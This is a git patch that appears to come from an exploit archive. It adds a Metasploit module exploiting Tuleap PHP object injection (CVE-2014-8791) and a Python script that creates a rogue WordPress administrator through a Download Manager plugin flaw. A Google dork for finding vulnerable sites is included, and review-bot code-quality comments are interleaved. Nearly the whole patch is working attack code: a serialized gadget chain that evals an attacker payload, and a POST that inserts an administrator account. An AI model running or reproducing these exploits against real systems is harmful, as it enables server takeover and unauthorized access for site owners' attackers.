From 4353d215d8288c16d92441ab492367a1bc52abb2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 17 Dec 2014 04:52:46 +0000
Subject: [PATCH] Updated 12_17_2014

---
 files.csv | 4 +-
 platforms/php/remote/35545.rb | 102 ++++++++++++++++++
 platforms/php/webapps/35533.py | 189 +++++++++++++++++++++++++++++++++
 3 files changed, 294 insertions(+), 1 deletion(-)
 create mode 100755 platforms/php/remote/35545.rb
 create mode 100755 platforms/php/webapps/35533.py

diff --git a/files.csv b/files.csv
index 8c1c4a22b..3d6820f0f 100755
--- a/files.csv
+++ b/files.csv
@@ -32006,9 +32006,11 @@ id,file,description,date,author,platform,type,port
 35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
+35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
 35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
-35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
+35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
 35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
+35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80
diff --git a/platforms/php/remote/35545.rb b/platforms/php/remote/35545.rb
new file mode 100755
index 000000000..c9b484949
--- /dev/null
+++ b/platforms/php/remote/35545.rb
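Review bot: The rewritten author field for entry 35539 reads `"Javer Nieto and Andres Rojas"`, while the line it replaces had `"Javier Nieto"`; the first name appears to have lost a letter in the edit rather than been deliberately changed. If the intent was only to add the second author, the new line should read `"Javier Nieto and Andres Rojas"`.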
@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Tuleap PHP Unserialize Code Execution',
+ 'Description' => %q{
+ This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be
+ abused to allow authenticated users to execute arbitrary code with the permissions of the
+ web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'
+ file. The exploit abuses the destructor method from the Jabbex class in order to reach a
+ call_user_func_array() call in the Jabber class and call the fetchPostActions() method from
+ the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In
+ order to work, the target must have the 'sys_create_project_in_one_step' option disabled.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => 'EgiX',
+ 'References' =>
+ [
+ ['CVE', '2014-8791'],
+ ['OSVDB', '115128'],
+ ['URL', 'http://karmainsecurity.com/KIS-2014-13'],
+ ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601']
+ ],
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['Generic (PHP Payload)', {}]],
+ 'DisclosureDate' => 'Nov 27 2014',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
+ OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+ OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
+ OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
+ Opt::RPORT(443)
+ ], self.class)
+ end
+
+ def check
+ flag = rand_text_alpha(rand(10)+20)
+ res = exec_php("print #{flag};")
+
+ if res and res.body and res.body.to_s =~ /#{flag}/
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def do_login()
+ print_status("#{peer} - Logging in...")
+
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'account/login.php'),
+ 'vars_post' => {'form_loginname' => username, 'form_pw' => password}
+ })
+
+ unless res && res.code == 302
+ fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")
+ end
+
+ print_status("#{peer} - Login successful with #{username}:#{password}")
+ res.get_cookies
+ end
+
+ def exec_php(php_code)
+ session_cookies = do_login()
+
+ chain = 'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}'
+ chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";'
+ chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'
+ chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}'
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'project/register.php'),
+ 'cookie' => session_cookies,
+ 'vars_post' => {'data' => chain},
+ 'headers' => {'payload' => Rex::Text.encode_base64(php_code)}
+ }, 3)
+ end
+
+ def exploit
+ print_status("#{peer} - Exploiting the PHP object injection...")
+ exec_php(payload.encoded)
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/35533.py b/platforms/php/webapps/35533.py
new file mode 100755
index 000000000..e08585f81
--- /dev/null
+++ b/platforms/php/webapps/35533.py
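Review bot: `do_login` writes the PASSWORD option in cleartext to the console on both the failure path (`fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")`) and the success path (`print_status("#{peer} - Login successful with #{username}:#{password}")`), so the operator's credentials end up in session logs and transcripts; naming the account is enough to diagnose the outcome, e.g. `print_status("#{peer} - Login successful as #{username}")` and the matching failure message. `check` is routed through `exec_php`, so a check run already performs the login and the unserialize request against the target rather than a passive probe; that should at least be stated in the module's Description. The Description also spells the product "Tuelap" where the Name and the rest of the text use "Tuleap".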
@@ -0,0 +1,189 @@
+#!/usr/bin/python
+#
+# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
+#
+# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
+#
+# Exploit written by Claudio Viviani
+#
+#
+# 2014-12-03: Discovered vulnerability
+# 2014-12-04: Patch released (2.7.5)
+#
+# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
+#
+# --------------------------------------------------------------------
+#
+# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
+#
+# function wpdm_ajax_call_exec()
+# {
+# if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
+# if (function_exists($_POST['execute']))
+# call_user_func($_POST['execute'], $_POST);
+# else
+# echo "function not defined!";
+# die();
+# }
+# }
+#
+# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
+# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
+#
+# if (function_exists($_POST['execute']))
+# call_user_func($_POST['execute'], $_POST);
+# else
+# ...
+# ...
+# ...
+#
+# $_POST data needs to be an array
+#
+#
+# The wordpress function wp_insert_user is perfect:
+#
+# http://codex.wordpress.org/Function_Reference/wp_insert_user
+#
+# Description
+#
+# Insert a user into the database.
+#
+# Usage
+#
+#
+#
+# Parameters
+#
+# $userdata
+# (mixed) (required) An array of user data, stdClass or WP_User object.
+# Default: None
+#
+#
+#
+# Evil POST Data (Add new Wordpress Administrator):
+#
+# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
+#
+# ---------------------------------------------------------------------
+#
+# Dork google: index of "wordpress-download"
+#
+# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
+#
+# Http connection
+import urllib, urllib2, socket
+#
+import sys
+# String manipulator
+import string, random
+# Args management
+import optparse
+
+# Check url
+def checkurl(url):
+ if url[:8] != "https://" and url[:7] != "http://":
+ print('[X] You must insert http:// or https:// procotol')
+ sys.exit(1)
+ else:
+ return url
+
+# Check if file exists and has readable
+def checkfile(file):
+ if not os.path.isfile(file) and not os.access(file, os.R_OK):
+ print '[X] '+file+' file is missing or not readable'
+ sys.exit(1)
+ else:
+ return file
+
+def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
+ return ''.join(random.choice(chars) for _ in range(size))
+
+banner = """
+ ___ ___ __
+ | Y .-----.----.--| .-----.----.-----.-----.-----.
+ |. | | _ | _| _ | _ | _| -__|__ --|__ --|
+ |. / \ |_____|__| |_____| __|__| |_____|_____|_____|
+ |: | ______ |__| __ __
+ |::.|:. | | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
+ `--- ---' |. | \| _ | | | | | | _ | _ | _ |
+ |. | |_____|________|__|__|__|_____|___._|_____|
+ |: 1 / ___ ___
+ |::.. . / | Y .---.-.-----.---.-.-----.-----.----.
+ `------' |. | _ | | _ | _ | -__| _|
+ |. \_/ |___._|__|__|___._|___ |_____|__|
+ |: | | |_____|
+ |::.|:. |
+ `--- ---'
+ Wordpress Download Manager
+ R3m0t3 C0d3 Ex3cut10n
+ (Add WP Admin)
+ v2.7.0-2.7.4
+
+ Written by:
+
+ Claudio Viviani
+
+ http://www.homelab.it
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
+commandList.add_option('-t', '--target', action="store",
+ help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+ )
+commandList.add_option('--timeout', action="store", default=10, type="int",
+ help="[Timeout Value] - Default 10",
+ )
+
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+ print(banner)
+ commandList.print_help()
+ sys.exit(1)
+
+host = checkurl(options.target)
+timeout = options.timeout
+
+print(banner)
+
+socket.setdefaulttimeout(timeout)
+
+username = id_generator()
+pwd = id_generator()
+
+body = urllib.urlencode({'action' : 'wpdm_ajax_call',
+ 'execute' : 'wp_insert_user',
+ 'user_login' : username,
+ 'user_pass' : pwd,
+ 'role' : 'administrator'})
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+
+print "[+] Tryng to connect to: "+host
+try:
+ req = urllib2.Request(host+"/", body, headers)
+ response = urllib2.urlopen(req)
+ html = response.read()
+
+ if html == "":
+ print("[!] Account Added")
+ print("[!] Location: "+host+"/wp-login.php")
+ print("[!] Username: "+username)
+ print("[!] Password: "+pwd)
+ else:
+ print("[X] Exploitation Failed :(")
+
+except urllib2.HTTPError as e:
+ print("[X] "+str(e))
+except urllib2.URLError as e:
+ print("[X] Connection Error: "+str(e))
+
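Review bot: `checkfile` calls `os.path.isfile` and `os.access`, but `os` is never imported (the import block brings in only `urllib`, `urllib2`, `socket`, `sys`, `string`, `random` and `optparse`), so any call would raise `NameError`; nothing in the script calls it, so it is dead code and should be removed rather than left as a trap for the next edit. Its condition joins the two tests with `and`, which contradicts the "missing or not readable" message it prints — further evidence it was never exercised. The script also mixes the Python 2 `print` statement (`print "[+] Tryng to connect to: "+host`) with `print(...)` calls; one form throughout reads better, and `Tryng` is a typo for `Trying`.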